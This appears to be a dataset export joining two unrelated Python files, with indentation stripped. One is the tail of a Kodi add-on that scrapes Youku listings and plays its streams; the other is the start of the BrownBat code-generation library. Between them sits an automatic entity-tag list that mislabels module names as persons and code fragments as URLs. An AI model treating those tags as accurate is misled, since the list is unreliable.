ok = dialog.ok(__addonname__,'地址解析错误(%d):\n%s' % (api_error_code,api_error_msg))
return {}
else:
return api_data
def change_cdn(url):
# if the cnd_url starts with an ip addr, it should be youku's old CDN
# which rejects http requests randomly with status code > 400
# change it to the dispatcher of aliCDN can do better
# at least a little more recoverable from HTTP 403
dispatcher_url = 'vali.cp31.ott.cibntv.net'
if dispatcher_url in url:
return url
elif 'k.youku.com' in url:
return url
else:
url_seg_list = list(urlparse.urlsplit(url))
url_seg_list[1] = dispatcher_url
return urlparse.urlunsplit(url_seg_list)
def PlayVideo(name,id,thumb):
movdat = youku_ups(id)
if not movdat:
return
vid = id
lang_select = int(__addon__.getSetting('lang_select')) # 默认|每次选择|自动首选
if lang_select != 0 and movdat.has_key('dvd') and 'audiolang' in movdat['dvd']:
langlist = movdat['dvd']['audiolang']
if lang_select == 1:
list = [x['lang'] for x in langlist]
sel = xbmcgui.Dialog().select('选择语言', list)
if sel ==-1:
return
vid = langlist[sel]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[sel]['lang'].encode('utf-8'))
else:
lang_prefer = __addon__.getSetting('lang_prefer') # 国语|粤语
for i in range(0,len(langlist)):
if langlist[i]['lang'].encode('utf-8') == lang_prefer:
vid = langlist[i]['vid'].encode('utf-8')
name = '%s %s' % (name, langlist[i]['lang'].encode('utf-8'))
break
if vid != id:
movdat = youku_ups(vid)
if not movdat:
return
streamtypes = [stream['stream_type'].encode('utf-8') for stream in movdat['stream']]
typeid, typename, streamno, resolution = selResolution(streamtypes)
if typeid:
'''
oip = movdat['security']['ip']
ep = movdat['security']['encrypt_string']
sid, token = youkuDecoder().get_sid(ep)
play_method = int(__addon__.getSetting('play_method'))
if play_method != 0: # m3u8方式
query = urllib.urlencode(dict(
vid=vid, ts=int(time.time()), keyframe=1, type=resolution,
ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid,
))
cookie = ['%s=%s' % (x.name, x.value) for x in cj][0]
movurl = 'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s' % (query, cookie)
else: # 默认播放方式
if typeid in ('mp4', 'mp4hd'):
type = 'mp4'
else:
type = 'flv'
urls = []
segs = movdat['stream'][streamno]['segs']
total = len(segs)
for no in range(0, total):
k = segs[no]['key']
if k == -1:
dialog = xbmcgui.Dialog()
ok = dialog.ok(__addonname__,'会员节目,无法播放')
return
fileid = segs[no]['fileid']
ep = youkuDecoder().generate_ep(no, fileid, sid, token)
query = urllib.urlencode(dict(
ctype = 12,
ev = 1,
K = k,
ep = urllib.unquote(ep),
oip = oip,
token = token,
yxon = 1
))
url = 'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format(
sid = sid,
container = type,
fileid = fileid,
query = query
)
link = GetHttpData(url)
json_response = simplejson.loads(link)
urls.append(json_response[0]['server'].encode('utf-8'))
movurl = 'stack://' + ' , '.join(urls)
'''
movurl = movdat['stream'][streamno]['m3u8_url']
#urls = []
#is_preview = False
#for seg in movdat['stream'][streamno]['segs']:
# if seg.get('cdn_url'):
# urls.append(change_cdn(seg['cdn_url'].encode('utf-8')))
# else:
# is_preview = True
#if not is_preview:
# movurl = 'stack://' + ' , '.join(urls)
name = '%s[%s]' % (name, typename)
listitem=xbmcgui.ListItem(name,thumbnailImage=thumb)
listitem.setInfo(type="Video",infoLabels={"Title":name})
xbmc.Player().play(movurl, listitem)
def performChanges(name,id,listpage,genre,area,year,order,days):
genrelist,arealist,yearlist = getList(listpage,id,genre,area,year)
change = False
if id == 'c_95':
str1 = '风格'
str3 = '发行'
elif id == 'c_84' or id == 'c_87':
str1 = '类型'
str3 = '出品'
else:
str1 = '类型'
str3 = '时间'
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
list = [x[1] for x in genrelist]
sel = dialog.select(str1, list)
if sel != -1:
genre = genrelist[sel][0]
change = True
if len(arealist)>0:
list = [x[1] for x in arealist]
sel = dialog.select('地区', list)
if sel != -1:
area = arealist[sel][0]
change = True
if len(yearlist)>0:
list = [x[1] for x in yearlist]
sel = dialog.select(str3, list)
if sel != -1:
year = yearlist[sel][0]
change = True
list = [x[1] for x in DAYS_LIST1]
sel = dialog.select('范围', list)
if sel != -1:
days = DAYS_LIST1[sel][0]
change = True
list = [x[1] for x in ORDER_LIST1]
sel = dialog.select('排序', list)
if sel != -1:
order = ORDER_LIST1[sel][0]
change = True
if change:
progList(name,id,'1',genre,area,year,order,days)
def performChanges2(name,id,listpage,genre,order,days):
genrelist = getList2(listpage, genre)
change = False
dialog = xbmcgui.Dialog()
if len(genrelist)>0:
list = [x[1] for x in genrelist]
sel = dialog.select('类型', list)
if sel != -1:
genre = genrelist[sel][0]
change = True
list = [x[1] for x in DAYS_LIST2]
sel = dialog.select('范围', list)
if sel != -1:
days = DAYS_LIST2[sel][0]
change = True
list = [x[1] for x in ORDER_LIST2]
sel = dialog.select('排序', list)
if sel != -1:
order = ORDER_LIST2[sel][0]
change = True
if change:
progList2(name,id,'1',genre,order,days)
def get_params():
param = []
paramstring = sys.argv[2]
if len(paramstring) >= 2:
params = sys.argv[2]
cleanedparams = params.replace('?', '')
if (params[len(params) - 1] == '/'):
params = params[0:len(params) - 2]
pairsofparams = cleanedparams.split('&')
param = {}
for i in range(len(pairsofparams)):
splitparams = {}
splitparams = pairsofparams[i].split('=')
if (len(splitparams)) == 2:
param[splitparams[0]] = splitparams[1]
return param
params = get_params()
mode = None
name = ''
id = ''
genre = ''
area = ''
year = ''
order = ''
page = '1'
url = None
thumb = None
try:
thumb = urllib.unquote_plus(params["thumb"])
except:
pass
try:
url = urllib.unquote_plus(params["url"])
except:
pass
try:
page = urllib.unquote_plus(params["page"])
except:
pass
try:
order = urllib.unquote_plus(params["order"])
except:
pass
try:
days = urllib.unquote_plus(params["days"])
except:
pass
try:
year = urllib.unquote_plus(params["year"])
except:
pass
try:
area = urllib.unquote_plus(params["area"])
except:
pass
try:
genre = urllib.unquote_plus(params["genre"])
except:
pass
try:
id = urllib.unquote_plus(params["id"])
except:
pass
try:
name = urllib.unquote_plus(params["name"])
except:
pass
try:
mode = int(params["mode"])
except:
pass
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
if mode == None:
rootList()
elif mode == 1:
progList(name,id,page,genre,area,year,order,days)
elif mode == 2:
getMovie(name,id,thumb)
elif mode == 3:
seriesList(name,id,thumb)
elif mode == 4:
performChanges(name,id,page,genre,area,year,order,days)
elif mode == 10:
PlayVideo(name,id,thumb)
elif mode == 11:
progList2(name,id,page,genre,order,days)
elif mode == 12:
performChanges2(name,id,page,genre,order,days)
| 27,353 | [['URL', "http://list.youku.com/'"], ['URL', "http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html'"], ['URL', "http://www.youku.com/show_page/id_'"], ['URL', 'http://v.youku.com/v_show/id_%s.html"'], ['URL', 'http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s"'], ['URL', "http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html'"], ['IP_ADDRESS', '127.0.0.1'], ['URL', "https://ups.youku.com/ups/get.json?%s'"], ['URL', "http://v.youku.com/'"], ['URL', "http://pl.youku.com/playlist/m3u8?%s|Cookie=%s'"], ['URL', "http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format"], ['LOCATION', 'xbmcgui'], ['LOCATION', 'xbmcaddon'], ['PERSON', 'urllib2'], ['LOCATION', 'os'], ['LOCATION', 'gzip'], ['PERSON', 'Mozilla/5.0'], ['DATE_TIME', "'5','最受欢迎'"], ['PERSON', 'DAYS_LIST2'], ['DATE_TIME', '65536'], ['NRP', 'sid'], ['PERSON', 'token = e_code.split'], ['NRP', 'sid'], ['PERSON', 'LOGDEBUG'], ['URL', 'code.co'], ['URL', 'urllib2.Re'], ['URL', 'req.ad'], ['URL', 'response.re'], ['PERSON', 'c_95'], ['DATE_TIME', 'year'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['PERSON', 'c_95'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', "yearstr + '"], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'<li class="title"><a'], ['PERSON', 'p_name = match1.group(1'], ['PERSON', 'match1 ='], ['URL', 'sys.ar'], ['URL', 'li.se'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['PERSON', 'li'], ['PERSON', 'ListItem'], ['URL', 'sys.ar'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', "match1 = re.compile('//v.youku.com"], ['PERSON', 'match1 = re.compile(\'title="(.+?)"\').search(match[i'], ['URL', 'sys.ar'], ['URL', 'li.se'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'<li class="title"><a'], ['PERSON', 'p_name = match1.group(1'], ['URL', 'sys.ar'], ['URL', 'li.se'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['PERSON', 'ListItem'], ['URL', 'sys.ar'], ['LOCATION', 'xbmcplugin.addDirectoryItem(int(sys.argv[1'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'mp4hd2v2'], ['PERSON', 'youku'], ['URL', 'vali.cp31.ott.cibntv.net'], ['URL', 'k.youku.com'], ['PERSON', 'streamtypes'], ['LOCATION', 'typename'], ['PERSON', 'streamno'], ['PERSON', 'oip=oip'], ['LOCATION', 'ctype=12'], ['PERSON', 'seg'], ['URL', 'seg.ge'], ['PERSON', 'typename'], ['PERSON', 'listitem=xbmcgui.'], ['PERSON', 'listitem'], ['DATE_TIME', 'days'], ['PERSON', 'c_95'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', "''\nyear"], ['URL', 'urllib2.HT'], ['URL', 'urllib2.in'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['IP_ADDRESS', '::'], ['URL', 'http://v.youku.com/v_show/id_'], ['URL', 'http://v.youku.com/v_show/id_'], ['URL', 'http://v.youku.com/v_show/id_'], ['URL', "https://log.mmstat.com/eg.js'"], ['URL', 'xbmcaddon.Ad'], ['URL', 'xbmc.tr'], ['URL', 'source.re'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'self.tr'], ['URL', 'self.tr'], ['URL', 'self.tr'], ['URL', 'req.ad'], ['URL', 'response.headers.ge'], ['URL', 'StringIO.St'], ['URL', 'response.headers.ge'], ['URL', 'response.cl'], ['URL', 'code.co'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 'httpdata.de'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 'match.gr'], ['URL', 'match0.gr'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'xbmcgui.Li'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 'v.youku.com/v_show/id_'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'match.gr'], ['URL', 're.com'], ['URL', 'xbmcgui.Li'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 're.com'], ['URL', 'match1.gr'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['URL', 'xbmcplugin.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'ratelist.so'], ['URL', 'data.ge'], ['URL', 'error.ge'], ['URL', 'error.ge'], ['URL', 'x.na'], ['URL', 'x.va'], ['URL', 'xbmcgui.Li'], ['URL', 'listitem.se'], ['URL', 'xbmc.Pl'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'dialog.se'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'params.re'], ['URL', 'cookielib.Co']] |
40 |
# Copyright 2014 Douglas RAILLARD
#
# This file is part of BrownBat.
#
# BrownBat is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BrownBat is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with BrownBat. If not, see <http://www.gnu.org/licenses/>.
"""
.. moduleauthor:: Douglas RAILLARD dummy@email.com
This module mostly provides base classes intended to be subclassed for building
langage specific source code generation libraries.
They implement functionnalities related to operators overloading that can be used in any langage.
Every class representing source code constructs are known as node.
The following helpers functions are provided:
* :func:`listify`: create a list from an iterable or a single element.
* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.).
* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string.
The following classes are provided:
* :class:`Indentation`: manage the indentation level in the code generator.
* :class:`NonIterable`: inheriting that class allows a class which can be considered as iterable to be considered as a non iterable by :func:`listify`.
* :class:`NodeMeta`: metaclass of all class representing some source code constructs.
* :class:`NodeABC`: abstract base class of all class representing some source code constructs.
* :class:`NodeBase`: base class of almost all class representing some source code constructs.
* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition.
* :class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC.
* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name.
* :class:`NodeViewBase`: base class for class representing a view of another node (for example a variable declaration is a view of a variable).
* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required.
* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading.
* :class:`TokenListABC`: abstract base class for token lists. This is a node that can contain a list of any object that can be used as a string, and concatenate them when printed.
* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance).
* :class:`TokenListBase`: base class for a token list.
* :class:`IndentedTokenListBase`: base class for a token list which indents it content when printed.
* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`.
* :class:`BacktraceBase`: base class for special token list that output a simplified backtrace of Python code that was used to build the instance. Useful when trying to debug the code generator.
"""
import collections
import numbers
import abc
import inspect
import copy
import functools
import os
def listify(iterable_or_single_elem):
"""Create a list out of:
* an iterable object: the result will be like ``list(iterable_or_single_elem)``
* a object which cannot be iterated over: return a list with only one item (just the object)
* an object which is iterable, but also a subclass of :class:`NonIterable`:
return a list with just the object, as if it was not iterable.
"""
if iterable_or_single_elem is None:
return []
# We exclude iterables such as strings or NonIterable (StmtContainer for example)
# because we want to keep them as one object and not split them
if isinstance(iterable_or_single_elem, collections.Iterable) \
and not isinstance(iterable_or_single_elem, (str, NonIterable)):
return list(iterable_or_single_elem)
else:
return [iterable_or_single_elem]
def format_string(string, style, separator="_"):
""" Format a string according to a convention.
It is can be used to write identfiers name in a unified format before applying a naming convention.
:param string: the string to be modified. It must be in a format where the word sperator is always the same.
:param style: the convention. It can be one of:
* UpperCamelCase
* lowerCamelCase
* lower_underscore_case
* UPPER_UNDERSCORE_CASE
:param separator: the word separator used to split the words appart before applying the convention.
It defaults to '_'.
"""
if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)):
token_list = string
else:
token_list = str(string).split(separator)
# If there is only one token in the list and in case it is an empty
# string, we dont want to replace it with a _
if len(token_list) != 1:
for i, token in enumerate(token_list):
if not token:
token_list[i] = separator
if style == "UpperCamelCase":
return "".join(token.capitalize() for token in token_list)
if style == "lowerCamelCase":
first_word = token_list[0].lower()
remain_list = token_list[1:]
return first_word+"".join(token.capitalize() for token in remain_list)
if style == "lower_underscore_case":
return "_".join(token.lower() for token in token_list)
if style == "UPPER_UNDERSCORE_CASE":
return "_".join(token.upper() for token in token_list)
def strip_starting_blank_lines(snippet):
"""Strip blank lines at the beginning of a multiline string."""
last_new_line_pos = 0
for position, char in enumerate(snippet):
if char=='\n':
last_new_line_pos = position
elif char!='\t' and char!=' ' and char!='\v':
break
# Only keep one new line at the beginning, to avoid multiple blank lines
return snippet[last_new_line_pos:]
class Indentation:
"""This class manages the indentation in the source code output.
Instances can be printed to give the string to put at the beginning of a new indented line.
>>> idt = Indentation()
>>> idt.indent()
>>> print('*'+str(idt)+'indented Hello World')
* indented Hello World
"""
# Default indentation style (4 spaces)
indentation_string = ' '
@classmethod
def ensure_idt(cls, idt):
"""Create a new indentation instance if *idt* is None,
or return *idt* if it is already an :class:`Indentation` instance.
"""
if idt is None:
idt = cls()
elif isinstance(idt, numbers.Integral):
idt = cls(idt)
elif isinstance(idt, str):
idt = cls(indentator=idt)
return idt
def __init__(self, level=0, indentator=None):
"""
:param level: the initial indentation level
:type level: int
:param indentator: the string used to display indentation.
It defaults to the class attribute *indentation_string* which is four spaces.
"""
self.indentation_level = level
# If an indentation is string is given, override the classwide default with
# an instance-local string
if indentator is not None:
self.indentation_string = indentator
def indent(self, level=1):
"""Increase the indentation level by *level* levels."""
self.indentation_level += level
def dedent(self, level=1):
"""Decrease the indentation level by *level* levels."""
self.indentation_level -= level
def __str__(self):
"""Return the string to be used at the beginning of a line to display the indentation."""
return self.indentation_string * self.indentation_level
class NonIterable:
""" Inheriting from this class will prevent a class to be considered as
:class:`collections.Iterable` by :func:`listify`.
"""
pass
class NodeMeta(abc.ABCMeta):
"""Meta class used for every node, i.e. every class representing source code constructs.
Currently, it only does a bit of black magic on :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods:
it creates a wrapper around them that calls *inline_str_filter* if it exists on their return string, to
let the user apply some naming convention at the latest stage.
"""
def __new__(meta, name, bases, dct):
# Add automatic 'inheritance' for __format_string class attribute
attr_name = '_'+name+'__format_string'
if bases and not attr_name in dct:
try:
dct[attr_name] = bases[0].__dict__['_'+bases[0].__name__+'__format_string']
except KeyError:
pass
# Wrap inline_str function to allow automatic filtering on its output
def make_wrapper(wrapped_fun):
@functools.wraps(wrapped_fun)
def wrapper_fun(self, *args, **kwargs):
result = wrapped_fun(self, *args, **kwargs)
try:
filter_fun = self.inline_str_filter
except AttributeError:
# Just return the string as is, no filter hook is installed
return result
else:
# Call the filter on the resulting string
return filter_fun(result)
return wrapper_fun
for stringify_fun_name in ['inline_str', 'self_inline_str']:
if stringify_fun_name in dct:
wrapped_fun = dct[stringify_fun_name]
dct[stringify_fun_name] = make_wrapper(wrapped_fun)
return super().__new__(meta, name, bases, dct)
class NodeABC(metaclass=NodeMeta):
"""This class is an Abstract Base Class describing the most basic API evey node should conform to."""
__format_string = ''
@abc.abstractmethod
def inline_str(self, idt=None):
"""This function is called to print the content of the node in an inline context.
This can be for example when the node is printed inside an expression.
This function should not try to print a preceding new line or indentation string.
"""
pass
@abc.abstractmethod
def freestanding_str(self, idt=None):
"""This function is called to print the content of the node in a freestanding context.
This can be for example when the node is printed in directly in the source file.
This function should print the preceding new line and indentation if the source code constructs
requires it.
"""
pass
@abc.abstractmethod
def adopt_node(self, child):
pass
class NodeAttrProxy(NodeABC):
"""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given
attribute of a given instance.
It creates stubs that allows transparent composition for the most limited subset of the APIs
provided by this library to avoid getting into crazy things.
This class should really be used when this enable to factor lots of code. A design based on
hooks implemented in subclasses called by a base class is preferable in most case where you
would be tempted to use this proxy.
"""
def __init__(self, obj, attr_name):
self.obj = obj
self.attr_name = attr_name
def inline_str(self, idt=None):
return getattr(self.obj, self.attr_name).inline_str(idt)
def freestanding_str(self, idt=None):
return getattr(self.obj, self.attr_name).freestanding_str(idt)
def adopt_node(self, child):
return getattr(self.obj, self.attr_name).adopt_node(child)
class EnsureNode:
"""This class is a descriptor that makes sure that the attribute that uses it holds a reference
to an instance of one of the classes given in *node_classinfo*.
When set, this descriptor check if the given object is indeed an instance of *node_classinfo* classes.
If not, it calls *node_factory* to build an object and store its return value. Therefore,
the content of the attribute using this descriptor is always some instance of the classes
contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions
on the type of data hold by the attribute.
.. note:: The *node_classinfo* always contains the class :class:`NodeABC`.
"""
def __init__(self, storage_attr_name, node_factory, node_classinfo=()):
"""
:param storage_attr_name: the underlying attribute used to store the object.
:param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute.
:param node_classinfo: this is a tuple that containes classes.
The value stored in the attribute is checked against this tuple using :func:`isinstance` to
determine if the factory should be used. This always contains at least :class:`NodeABC`
"""
self.storage_attr_name = storage_attr_name
self.node_factory = node_factory
node_classinfo = listify(node_classinfo)+[NodeABC]
if inspect.isclass(self.node_factory):
node_classinfo.append(self.node_factory)
node_classinfo = tuple(node_classinfo)
self.node_classinfo = node_classinfo
def __get__(self, instance, owner):
if instance is not None:
return instance.__dict__[self.storage_attr_name]
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
instance.__dict__[self.storage_attr_name] = value
class NodeBase(NodeABC):
"""This class is the base classes of most nodes.
It provides some default implementations for methods of :class:`NodeABC`.
"""
@classmethod
def ensure_node(cls, obj, factory=None):
"""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC`
, and if not, tries to build a node from it using the class this class method is called from or *factory*.
.. note:: You should better use the :class:`EnsureNode` descriptor when possible, instead of making a use of
this class method.
.. warning:: Not every class supports to be called whith only one parameter, so a call to this
class method is note is not guaranteed to succeed.
:param obj: the object to build a node from.
:param factory: an optional factory used to build the node from *obj*. If not provided, the class this
method is called from is called whith *obj* as first and only parameter.
"""
if isinstance(obj, (cls, NodeABC)):
return obj
else:
if factory is not None:
return factory(obj)
else:
return cls(obj)
def __init__(self, comment=None, side_comment=None, parent=None):
""" All of the paramaters should be used as keyword arguments, because they are forwarded from
the children classes and the order at the arrival is not guaranteed.
:param comment: a comment node that will be printed next to the current node when the source code of
the node is generated. Usually, it is a block comment printed before the node
in languages that supports them. This comment is printed by the containers such as
:class:`NodeContainerBase`, so it does not require any support from the class.
:param side_comment: a comment that will be printed just by the current node when the source code of
the node is generated. Usually, it is a one line comment, printed right to the
node. Be aware that this parameter is used by the class in whatever way it wants to,
and there is no guarantee it will be printed at all.
"""
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.comment = comment
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.side_comment = side_comment
# We dont use try: ... except: to avoid catching exceptions
# occuring inside adopt_node call
if parent is not None:
if hasattr(parent, 'adopt_node'):
parent.adopt_node(self)
else:
raise NotImplementedError("The given parent does not support child adoption")
def freestanding_str(self, idt=None):
"""See :class:`NodeABC` for the role of this function.
This implementation just calls *inline_str* and prepends a new line and indentation string.
"""
idt = Indentation.ensure_idt(idt)
snippet = self.inline_str(idt)
# Do not output anything if the string is empty
if snippet:
return '\n'+str(idt)+snippet
else:
return ''
def __str__(self, idt=None):
"""This implementation tries to print the node by probing the object for some methods:
1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node
2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node
3. *freestanding_str()*: see :class:`NodeABC`
"""
# We dont use try: ... except: to avoid catching exceptions
# occuring inside freestanding_str call
# Try to display a declaration
if hasattr(self, 'decl'):
self_decl = self.decl()
if isinstance(self_decl, NodeABC):
return self_decl.freestanding_str(idt)
# Or a definition
elif hasattr(self, 'defi'):
self_defi = self.defi()
if isinstance(self_defi, NodeABC):
return self_defi.freestanding_str(idt)
else:
return self.freestanding_str(idt)
def adopt_node(self, child):
self.append(child)
class DelegatedAttribute:
"""This class is a descriptor that allows an object to use the value of that attribute of another instance.
For example, the comment attribute of a parent node of a :class:`NodeViewBase` instance is used as the comment
attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the
:class:`NodeViewBase` instance. When that attribute is set, it uses its own object instead of refering to its parent
one.
"""
def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()):
"""
:param attr_name: the name of the attribute to manage.
:param delegated_to_attr_name: the name of the attribute holding a reference to the other instance also
holding an *attr_name* attribute.
:param descriptor: a descriptor class, in case the attribute should be managed through a descriptor.
This allows basic descriptor chaining.
:param default_value_list: a list of default values that does not trigger the switch to the local attribute.
For example, if a class set by default a *comment* attribute to None, the attribute
look up should still be made in the other instance. That way, it allows some placeholder
value to be set, without altering the intended behavior.
"""
self.attr_name = attr_name
self.delegated_to_attr_name = delegated_to_attr_name
self.descriptor = descriptor
self.default_value_list = default_value_list
def __get__(self, instance, owner):
if instance is not None:
# If the attribute has been set on the instance, just get it
if instance.__dict__.get('__'+self.attr_name+'_is_set', False):
if self.descriptor is not None:
return self.descriptor.__get__(instance, owner)
else:
return instance.__dict__[self.attr_name]
# Else it means that the attribute has not been set,
# so we delegate to the parent
else:
parent = getattr(instance, self.delegated_to_attr_name)
return getattr(parent, self.attr_name)
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if self.descriptor is not None:
self.descriptor.__set__(instance, value)
else:
instance.__dict__[self.attr_name] = value
# If the value is one of the default_value_list, do not consider that the attribute was
# set. This allows some code in base classes to set the attribute to None
# by default, and still get the parent's attribute when it is the case
if value not in self.default_value_list:
instance.__dict__['__'+self.attr_name+'_is_set'] = True
class NodeViewBase(NodeBase):
"""This is the base class of the node that are view of other node.
For example, a variable declaration is a view of the variable, as it only displays
informations already contained in the variable object.
View nodes should store the reference of their parent in a *parent* attribute.
"""
def __init__(self, parent, *args, **kwargs):
self.parent = parent
super().__init__(*args, **kwargs)
def __eq__(self, other):
"""implementation of the equality test between two views:
it tests to see if they have the same parent and if the two view
are of the exact same type.
"""
return type(self) is type(other) and self.parent is other.parent
class PhantomNode(NodeBase):
"""This class is a node that will be printed as an empty string.
This is intended to be used as a placeholder when a :class:`NodeABC` instance is required.
"""
# PhantomNode must not call Node.__init__ because it causes infinite
# recursion when built from Node.__init__
def __init__(self, *args, **kwargs):
self.parent = self
self.comment = self
self.side_comment = self
def inline_str(self, idt=None):
return ''
freestanding_str = inline_str
# Instance used everywhere, instead of creating billions of identical PhantomNode
PHANTOM_NODE = PhantomNode()
class NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable):
"""This is the base class of all the nodes that contains a list of other nodes.
It implements all the logic for operators overloading, and printing the nodes that it takes care of.
It also derives from the :class:`collections.MutableSequence` abstract base class, so it behaves
like a list. The only exception is when given to :func:`listify`, it remains as a single object, because
it also derives from :class:`NonIterable`. This is intended to allow the user to add nodes to it later,
